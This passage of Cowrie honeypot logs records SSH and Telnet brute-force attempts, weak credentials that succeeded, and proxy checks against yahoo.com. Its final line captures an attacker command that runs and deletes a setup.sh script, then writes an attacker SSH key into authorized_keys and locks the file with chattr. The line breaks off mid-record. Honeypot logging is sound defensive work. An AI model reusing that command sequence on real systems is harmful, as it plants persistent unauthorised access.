angCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T23:09:34.225782Z","src_ip":"213.209.150.239","session":"f88f001b3689"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:09:34.461321Z","src_ip":"213.209.150.239","session":"f88f001b3689"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":3309,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:3309","sensor":"my-vps","timestamp":"2025-08-26T23:09:34.509329Z","session":"f88f001b3689"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T23:09:34.556624Z","src_ip":"213.209.150.239","session":"f88f001b3689"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":26859,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:26859","sensor":"my-vps","timestamp":"2025-08-26T23:09:34.693531Z","session":"f88f001b3689"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T23:09:34.740721Z","src_ip":"213.209.150.239","session":"f88f001b3689"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:09:34.788493Z","src_ip":"213.209.150.239","session":"f88f001b3689"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44784,"dst_ip":"1.2.3.4","dst_port":23,"session":"7061fbcfb13e","protocol":"telnet","message":"New connection: 212.227.125.160:44784 (1.2.3.4:23) [session: 7061fbcfb13e]","sensor":"my-vps","timestamp":"2025-08-26T23:09:51.995259Z"}
{"eventid":"cowrie.session.closed","duration":12.735230922698975,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:10:04.730391Z","src_ip":"212.227.125.160","session":"7061fbcfb13e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36484,"dst_ip":"1.2.3.4","dst_port":22,"session":"e48c7a6877ea","protocol":"ssh","message":"New connection: 212.227.235.229:36484 (1.2.3.4:22) [session: e48c7a6877ea]","sensor":"my-vps","timestamp":"2025-08-26T23:10:37.752766Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:10:38.072132Z","src_ip":"212.227.235.229","session":"e48c7a6877ea"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T23:10:38.072947Z","src_ip":"212.227.235.229","session":"e48c7a6877ea"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"54321","message":"login attempt [odoo/54321] failed","sensor":"my-vps","timestamp":"2025-08-26T23:10:42.202494Z","src_ip":"212.227.235.229","session":"e48c7a6877ea"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:10:44.840510Z","src_ip":"212.227.235.229","session":"e48c7a6877ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42798,"dst_ip":"1.2.3.4","dst_port":22,"session":"77ddf4da5c9f","protocol":"ssh","message":"New connection: 212.227.235.229:42798 (1.2.3.4:22) [session: 77ddf4da5c9f]","sensor":"my-vps","timestamp":"2025-08-26T23:11:17.442736Z"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.148.28","src_port":53866,"dst_ip":"1.2.3.4","dst_port":23,"session":"bfe4fe8f1315","protocol":"telnet","message":"New connection: 176.65.148.28:53866 (1.2.3.4:23) [session: bfe4fe8f1315]","sensor":"my-vps","timestamp":"2025-08-26T23:11:21.957092Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:11:21.996845Z","src_ip":"176.65.148.28","session":"bfe4fe8f1315"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T23:11:22.074923Z","src_ip":"176.65.148.28","session":"bfe4fe8f1315"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35491,"dst_ip":"1.2.3.4","dst_port":23,"session":"17e163f2ff04","protocol":"telnet","message":"New connection: 212.227.125.160:35491 (1.2.3.4:23) [session: 17e163f2ff04]","sensor":"my-vps","timestamp":"2025-08-26T23:11:22.167995Z"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:11:22.427195Z","src_ip":"212.227.235.229","session":"77ddf4da5c9f"}
{"eventid":"cowrie.session.closed","duration":30.770212173461914,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:11:52.938145Z","src_ip":"212.227.125.160","session":"17e163f2ff04"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":11906,"dst_ip":"1.2.3.4","dst_port":22,"session":"c42739756a65","protocol":"ssh","message":"New connection: 212.227.235.229:11906 (1.2.3.4:22) [session: c42739756a65]","sensor":"my-vps","timestamp":"2025-08-26T23:11:59.996104Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:11:59.997365Z","src_ip":"212.227.235.229","session":"c42739756a65"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":12208,"dst_ip":"1.2.3.4","dst_port":22,"session":"b63bd47005c4","protocol":"ssh","message":"New connection: 212.227.235.229:12208 (1.2.3.4:22) [session: b63bd47005c4]","sensor":"my-vps","timestamp":"2025-08-26T23:12:00.123345Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:12:00.124905Z","src_ip":"212.227.235.229","session":"b63bd47005c4"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T23:12:00.253761Z","src_ip":"212.227.235.229","session":"b63bd47005c4"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:12:00.639345Z","src_ip":"212.227.235.229","session":"b63bd47005c4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T23:12:00.768591Z","session":"b63bd47005c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40696,"dst_ip":"1.2.3.4","dst_port":22,"session":"5ae48bdd5a2a","protocol":"ssh","message":"New connection: 212.227.235.229:40696 (1.2.3.4:22) [session: 5ae48bdd5a2a]","sensor":"my-vps","timestamp":"2025-08-26T23:12:43.678334Z"}
{"eventid":"cowrie.session.connect","src_ip":"64.226.115.244","src_port":6102,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a5cab7d5309","protocol":"ssh","message":"New connection: 64.226.115.244:6102 (1.2.3.4:22) [session: 4a5cab7d5309]","sensor":"my-vps","timestamp":"2025-08-26T23:12:44.231006Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-26T23:12:44.245891Z","src_ip":"64.226.115.244","session":"4a5cab7d5309"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-26T23:12:44.270997Z","src_ip":"64.226.115.244","session":"4a5cab7d5309"}
{"eventid":"cowrie.session.connect","src_ip":"125.59.136.99","src_port":33602,"dst_ip":"1.2.3.4","dst_port":23,"session":"60eb40b9ca45","protocol":"telnet","message":"New connection: 125.59.136.99:33602 (1.2.3.4:23) [session: 60eb40b9ca45]","sensor":"my-vps","timestamp":"2025-08-26T23:12:44.532190Z"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-26T23:12:44.988296Z","src_ip":"64.226.115.244","session":"4a5cab7d5309"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:12:44.989892Z","src_ip":"64.226.115.244","session":"4a5cab7d5309"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:12:45.789765Z","src_ip":"212.227.235.229","session":"5ae48bdd5a2a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T23:12:45.790579Z","src_ip":"212.227.235.229","session":"5ae48bdd5a2a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48420,"dst_ip":"1.2.3.4","dst_port":22,"session":"071a9d9ff758","protocol":"ssh","message":"New connection: 212.227.235.229:48420 (1.2.3.4:22) [session: 071a9d9ff758]","sensor":"my-vps","timestamp":"2025-08-26T23:12:55.508920Z"}
{"eventid":"cowrie.login.success","username":"root","password":"ubuntu1404","message":"login attempt [root/ubuntu1404] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:12:55.941060Z","src_ip":"212.227.235.229","session":"5ae48bdd5a2a"}
{"eventid":"cowrie.session.closed","duration":12.154585123062134,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:12:56.686708Z","src_ip":"125.59.136.99","session":"60eb40b9ca45"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:12:56.881938Z","src_ip":"212.227.235.229","session":"071a9d9ff758"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T23:12:56.882762Z","src_ip":"212.227.235.229","session":"071a9d9ff758"}
{"eventid":"cowrie.session.closed","duration":"16.7","message":"Connection lost after 16.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:13:00.387691Z","src_ip":"212.227.235.229","session":"5ae48bdd5a2a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":10548,"dst_ip":"1.2.3.4","dst_port":22,"session":"d8819a3174ba","protocol":"ssh","message":"New connection: 212.227.235.229:10548 (1.2.3.4:22) [session: d8819a3174ba]","sensor":"my-vps","timestamp":"2025-08-26T23:13:00.490425Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:13:00.491529Z","src_ip":"212.227.235.229","session":"d8819a3174ba"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"4321","message":"login attempt [odoo/4321] failed","sensor":"my-vps","timestamp":"2025-08-26T23:13:00.575336Z","src_ip":"212.227.235.229","session":"071a9d9ff758"}
{"eventid":"cowrie.client.kex","hassh":"5f904648ee8964bef0e8834012e26003","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 5f904648ee8964bef0e8834012e26003","sensor":"my-vps","timestamp":"2025-08-26T23:13:00.595912Z","src_ip":"212.227.235.229","session":"d8819a3174ba"}
{"eventid":"cowrie.login.success","username":"root","password":"ubuntu1404","message":"login attempt [root/ubuntu1404] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:13:00.911590Z","src_ip":"212.227.235.229","session":"d8819a3174ba"}
{"eventid":"cowrie.session.closed","duration":"9.6","message":"Connection lost after 9.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:13:05.070713Z","src_ip":"212.227.235.229","session":"071a9d9ff758"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:13:10.126298Z","src_ip":"212.227.235.229","session":"b63bd47005c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":63547,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e4446a00bf0","protocol":"ssh","message":"New connection: 212.227.125.160:63547 (1.2.3.4:22) [session: 4e4446a00bf0]","sensor":"my-vps","timestamp":"2025-08-26T23:13:21.368142Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T23:13:21.368970Z","src_ip":"212.227.125.160","session":"4e4446a00bf0"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T23:13:21.477779Z","src_ip":"212.227.125.160","session":"4e4446a00bf0"}
{"eventid":"cowrie.login.failed","username":"todd","password":"todd","message":"login attempt [todd/todd] failed","sensor":"my-vps","timestamp":"2025-08-26T23:13:22.032861Z","src_ip":"212.227.125.160","session":"4e4446a00bf0"}
{"eventid":"cowrie.login.failed","username":"todd","password":"todd1","message":"login attempt [todd/todd1] failed","sensor":"my-vps","timestamp":"2025-08-26T23:13:23.501412Z","src_ip":"212.227.125.160","session":"4e4446a00bf0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T23:13:23.978499Z","src_ip":"212.227.235.229","session":"d8819a3174ba"}
{"eventid":"cowrie.command.input","input":"chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a","message":"CMD: chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa 